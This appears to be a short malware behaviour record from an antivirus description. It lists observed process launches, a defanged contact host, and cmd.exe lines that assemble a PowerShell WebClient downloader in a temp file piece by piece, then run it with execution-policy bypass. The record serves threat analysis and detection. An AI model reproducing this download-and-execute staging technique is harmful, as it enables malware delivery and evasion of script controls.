Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -File %TEMP%\4.ps1
- '<SYSTEM32>\wscript.exe' %TEMP%\1.js
- %TEMP%\4.ps1
- 'tn#.im':80
- http://tn#.im/9Wd
- DNS ASK tn#.im
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="(New-Object System.N" 1>%TEMP%\4.ps1"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="et.WebClient).Downlo" 1>>%TEMP%\4.ps1"